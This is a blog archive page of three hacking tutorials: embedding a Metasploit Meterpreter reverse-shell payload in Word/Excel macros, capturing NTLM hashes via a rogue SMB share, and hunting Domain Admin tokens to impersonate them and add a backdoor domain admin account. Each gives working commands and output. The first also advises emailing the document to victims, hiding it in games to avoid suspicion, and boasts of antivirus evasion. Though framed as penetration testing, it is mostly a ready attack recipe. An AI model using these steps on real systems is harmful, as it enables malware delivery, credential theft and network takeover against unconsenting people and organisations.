Showing posts with label Tutorials. Show all posts
Showing posts with label Tutorials. Show all posts

Friday, June 22, 2012

VBScript Infection Methods


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well. It doesn’t necessarily need to be a Metasploit payload. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through.
First things first, lets create our VBScript and set up a Metasploit listener.
Code:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 280
Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai
root@bt4:/pentest/exploits/framework3# mv payload.exe tools/
root@bt4:/pentest/exploits/framework3# cd tools/
root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 14510 bytes of EXE into a VBA script
root@bt4:/pentest/exploits/framework3/tools# cd..
root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler
[*] Please wait while we load the module tree...
exploit/multi/handler Generic Payload Handler
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
To recap everything we have performed up until now, we have created our payload using the shikata_ga_nai polymorphic encoder, turned it into an executable, had it connect back to us on port 8080 at host 10.211.55.162. We then convert our executable to VBScript using the “exe2vba.rb” script in the tools section. Once this is complete, you will need to get on a Windows machine that has Word on it and perform the following steps:
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “moo” and select “create”.
This will open up the visual basic editor. Paste the output of the payload.vbs file into the editor, save it and type some junk into the actual word doc itself. This is when you would perform the client-side attack by emailing this Word document to someone.
In order to keep user suspicion low, try embedding the code in one of the many Word/Excel games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.
Here we give a generic name to the macro.
First, test out the document by opening it up, check back to where we have our Metasploit exploit/multi/handler listener:
Code:
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696)
 
meterpreter> execute -f cmd.exe -i
Process 2152 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\rel1k>
Success! We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn’t get picked up by anti-virus!!!
Note there are multiple methods to do this, you could also use the:
Code:
root@bt4:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe
This will output the payload to a vbs script so follow the same steps as mentioned above. Something to mention is that macros are pretty much disabled by default in both home and corporate environments, so you would either have to entice them to enable macros or hope that they enable them to view the entire document properly. This is where having the script embedded in a document containing an embedded Flash game comes in handy.
Posted by at No comments:
Labels: , , , , , , , , , , , , ,

NTLM Authentication Hijack using Metasploit


Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for smb pattern
Code:
msf > search smb
Step 2: Use SMB Auxiliary module to capture hashes
Code:
msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Step 3: From the target machine, connect to our machine by using:
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake link (doesn’t exist).
Step 4: Switch to our machine and check if you’ve got the hashes captured
Code:
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Press Ctrl-C to exit from msf console.
To display our captured hashes, change to /tmp directory:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
Posted by at No comments:
Labels: , , , , , , , , , , , , ,

Hunting for Domain Admin Tokens


Penetration Assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code, really excels! Less time is wasted on mundane tasks. Automation is always key. Automating the tasks that should be automated. It is clear that there are specific tasks that can’t/shouldn’t be automated, but that is a topic for another post.
One nice example I have seen during several on-site assessments, is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can takes hours of manually work. I mentioned this to HD Moore he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.
Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
Example of the file:
Code:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin
We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
Code:
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt
To achieve Domain Admin privileges, we need to connect to a session that contained a Domain Admin token.
Code:
msf> sessions -i [session-with-domain-admin-token]
Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
Code:
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t
Lastly, we add a new account to the domain and add the account into the Domain Admins group.
Code:
C:\net user hack0r h4ck0r) /add /domain
C:\net group "Domain Admins" hack0r /add /domain
Enjoy it and Pwn dem v0hns!
Posted by at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)